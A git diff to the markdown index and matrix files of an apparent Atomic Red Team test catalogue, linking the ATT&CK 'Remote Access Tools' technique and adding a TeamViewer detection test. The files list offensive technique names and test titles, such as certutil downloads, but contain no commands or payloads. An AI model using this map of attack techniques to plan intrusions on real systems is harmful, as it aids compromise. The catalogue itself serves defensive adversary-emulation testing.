[Trap](./T1154/T1154.md) | | [Masquerading](./T1036/T1036.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Remote Access Tools](./T1219/T1219.md) | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Remote File Copy](./T1105/T1105.md) | | | | [Web Shell](./T1100/T1100.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Application Layer Protocol](./T1071/T1071.md) | | | | | | [Process Injection](./T1055/T1055.md) | | | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) | diff --git a/atomics/macos-index.md b/atomics/macos-index.md index f7109143..aaadbeff 100644 
--- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -322,7 +322,7 @@ - T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1219 Remote Access Tools](./T1219/T1219.md) - [T1105 Remote File Copy](./T1105/T1105.md) - Atomic Test #1: rsync remote file copy (push) [linux, macos] - Atomic Test #2: rsync remote file copy (pull) [linux, macos] diff --git a/atomics/macos-matrix.md b/atomics/macos-matrix.md index c0473a2c..ddf8a3d5 100644 --- a/atomics/macos-matrix.md +++ b/atomics/macos-matrix.md 
@@ -16,7 +16,7 @@ | | | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Web Shell](./T1100/T1100.md) | [Hidden Files and Directories](./T1158/T1158.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](./T1063/T1063.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Logon Scripts](./T1037/T1037.md) | | [Hidden Users](./T1147/T1147.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](./T1518/T1518.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Plist Modification](./T1150/T1150.md) | | [Hidden Window](./T1143/T1143.md) | | [System Information Discovery](./T1082/T1082.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | [Remote Access Tools](./T1219/T1219.md) | | | | [Rc.common](./T1163/T1163.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Remote File Copy](./T1105/T1105.md) | | | | [Re-opened Applications](./T1164/T1164.md) | | [Install Root Certificate](./T1130/T1130.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) | | | | Redundant Access [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) | diff --git a/atomics/matrix.md b/atomics/matrix.md index a9f19cbc..4d089406 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md 
@@ -16,7 +16,7 @@ | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File System Permissions Weakness](./T1044/T1044.md) | [Connection Proxy](./T1090/T1090.md) | [Input Prompt](./T1141/T1141.md) | [Permission Groups Discovery](./T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Launchctl](./T1152/T1152.md) | [Create Account](./T1136/T1136.md) | [Hooking](./T1179/T1179.md) | [Control Panel Items](./T1196/T1196.md) | [Kerberoasting](./T1208/T1208.md) | [Process Discovery](./T1057/T1057.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Local Job Scheduling](./T1168/T1168.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [DCShadow](./T1207/T1207.md) | [Keychain](./T1142/T1142.md) | [Query Registry](./T1012/T1012.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Mshta](./T1170/T1170.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Mshta](./T1170/T1170.md) | Dylib 
Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Remote Access Tools](./T1219/T1219.md) | | | [PowerShell](./T1086/T1086.md) | [Emond](./T1519/T1519.md) | [New Service](./T1050/T1050.md) | [DLL Side-Loading](./T1073/T1073.md) | [Network Sniffing](./T1040/T1040.md) | [Security Software Discovery](./T1063/T1063.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Remote File Copy](./T1105/T1105.md) | | | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](./T1502/T1502.md) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Password Filter DLL](./T1174/T1174.md) | [Software Discovery](./T1518/T1518.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Standard Application Layer Protocol](./T1071/T1071.md) | | | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Private Keys](./T1145/T1145.md) | [System Information Discovery](./T1082/T1082.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Standard Cryptographic Protocol](./T1032/T1032.md) | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index c6a0b2e5..61c37939 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
@@ -707,7 +707,8 @@ - T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1219 Remote Access Tools](./T1219/T1219.md) + - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - [T1105 Remote File Copy](./T1105/T1105.md) - Atomic Test #7: certutil download (urlcache) [windows] - Atomic Test #8: certutil download (verifyctl) [windows] diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index bb0a5437..0ff3ab7b 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md 
@@ -15,7 +15,7 @@ | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | [Control Panel Items](./T1196/T1196.md) | [Kerberoasting](./T1208/T1208.md) | [Process Discovery](./T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Mshta](./T1170/T1170.md) | [Create Account](./T1136/T1136.md) | [New Service](./T1050/T1050.md) | [DCShadow](./T1207/T1207.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](./T1012/T1012.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [PowerShell](./T1086/T1086.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | [Parent PID Spoofing](./T1502/T1502.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | [Network Sniffing](./T1040/T1040.md) | [Remote System Discovery](./T1018/T1018.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](./T1073/T1073.md) | [Password Filter DLL](./T1174/T1174.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | 
[Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](./T1073/T1073.md) | [Password Filter DLL](./T1174/T1174.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Remote Access Tools](./T1219/T1219.md) | | | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Private Keys](./T1145/T1145.md) | [Software Discovery](./T1518/T1518.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Remote File Copy](./T1105/T1105.md) | | | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [PowerShell Profile](./T1504/T1504.md) | [Disabling Security Tools](./T1089/T1089.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) | | | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |